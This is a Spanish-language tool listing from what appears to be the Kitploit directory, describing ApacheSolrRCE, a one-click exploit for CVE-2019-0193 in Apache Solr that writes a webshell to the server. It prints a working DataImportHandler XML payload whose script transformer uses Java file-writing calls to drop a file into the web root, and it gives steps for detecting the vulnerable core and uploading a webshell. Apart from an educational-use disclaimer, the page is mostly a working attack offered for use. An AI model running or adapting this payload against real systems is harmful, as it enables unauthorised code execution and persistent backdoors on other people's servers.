Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ApacheSolrRCE — ApacheSolrRCE (CVE-2019-0193) permite escribir un shell con un solo clic; el principio es escribir un webshell mediante un flujo de archivos Java ejecutado por código. | Kitploit
Herramientas/GitHubGitHub/freefv/apachesolrrce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubfreefv/apachesolrrce

ApacheSolrRCE

ApacheSolrRCE (CVE-2019-0193) permite escribir un shell con un solo clic; el principio es escribir un webshell mediante un flujo de archivos Java ejecutado por código.

Ver Repositorio
1hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Declaración del proyecto

Solo para intercambio educativo en seguridad de la información, no lo utilice para pruebas o ataques ilegales.

ApacheSolrRCE

ApacheSolrRCE (CVE-2019-0193) escribe un shell con un solo clic. El principio es escribir una puerta trasera a través de un flujo de archivos Java ejecutado por código.

Nota: El autor no es muy hábil. Si encuentras algún error o tienes otras necesidades, descarga el código y modifícalo tú mismo.

Descripción de la herramienta

Dado que los payloads que circulan en Internet son solo ejecución de comandos y no son convenientes para subir un webshell, escribí este payload (cuando se muestra 123456, significa que la escritura fue exitosa).

Nota: La herramienta solo ayuda en las pruebas. Si la herramienta no puede escribir, se recomienda hacerlo manualmente.

root@kitploit:~
<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />
  <script><![CDATA[
          function poc(row){
var buf = new java.io.BufferedWriter(new java.io.FileWriter(java.net.URLDecoder.decode(java.lang.Thread.currentThread().getContextClassLoader().getResource("").getPath().toString().replaceAll("file:\/", "").split("WEB-INF")[0]+"1.txt")));buf.write(new java.lang.String(java.util.Base64.getDecoder().decode("MTIzNDU2")));buf.close();
row.put("title",123456);
return row;

}

]]></script>

<document>
    <entity
        stream="true"
        name="entity1"
        datasource="streamsrc1"
        processor="XPathEntityProcessor"
        rootEntity="true"
        forEach="/RDF/item"
        transformer="script:poc">
             <field column="title" xpath="/RDF/item/title" />
    </entity>
</document>
</dataConfig>

Uso de la herramienta

Primero haga clic en 'Detectar', obtenga el core y determine si hay una vulnerabilidad.

Luego haga clic en 'getshell'.

Nota: Coloque su webshell en el directorio shell, la herramienta cargará automáticamente su webshell en la lista desplegable.

El proxy predeterminado es proxy HTTP, puerto 8080, está hardcodeado en el código. Si lo necesita, compílelo y modifíquelo usted mismo.

Agradecimientos especiales

solr_exploit

Descargar herramienta